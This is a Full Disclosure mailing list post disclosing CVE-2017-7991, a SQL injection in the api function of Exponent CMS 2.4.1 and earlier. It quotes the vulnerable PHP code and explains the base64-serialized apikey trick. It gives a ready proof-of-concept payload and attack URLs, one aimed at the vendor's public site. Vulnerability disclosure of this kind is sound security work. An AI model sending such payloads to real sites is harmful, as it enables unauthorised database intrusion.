Full Disclosure mailing list archives
CVE-2017-7991-SQL injection-Exponent CMS
From: "404 Not Found" <root () 4o4notfound org>
Date: Fri, 21 Apr 2017 14:14:38 +0800
CVE-2017-7991-SQL injection-Exponent CMS [Suggested description]
Exponent CMS 2.4.1 and earlier has SQL injection via a base64 serialized API key (apikey parameter) in the api function of framework/modules/eaas/controllers/eaasController.php. ------------------------------------------ [Additional Information] Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php Vulnerable function is api. public function api() { if (empty($this->params['apikey'])) { $_REQUEST['apikey'] = true; // set this to force an ajax reply $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null); $ar->send(); //FIXME this doesn't seem to work correctly in this scenario } else { echo $this->params['apikey']; $key = expUnserialize(base64_decode(urldecode($this->params['apikey']))); echo $key; $cfg = new expConfig($key); $this->config = $cfg->config; if(empty($cfg->id)) { $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null); $ar->send(); } else { if (!empty($this->params['get'])) { $this->handleRequest(); } else { $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null); $ar->send(); } } } } We can control param $apikey by using base64_encode and serialize functions to encrypt the SQL injection string. Then, the $apikey will be decrypted and cause SQL injection. Such as, if we want to use "aaa\'or sleep(2)#" to inject, we should use "echo base64_encode(serialize($apikey));" to encrypt the Attack string: czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So, http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the PoC. The result is: the site will sleep several seconds, and you can see SQL injection is successful in MySQL logs. ------------------------------------------ [Vulnerability Type] SQL Injection ------------------------------------------ [Vendor of Product] Exponent CMS ------------------------------------------ [Affected Product Code Base] Exponent CMS - 2.4.1 and earlier ------------------------------------------ [Affected Component] \framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 ------------------------------------------ [Discoverer] 404notfound
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CVE-2017-7991-SQL injection-Exponent CMS 404 Not Found (Apr 21)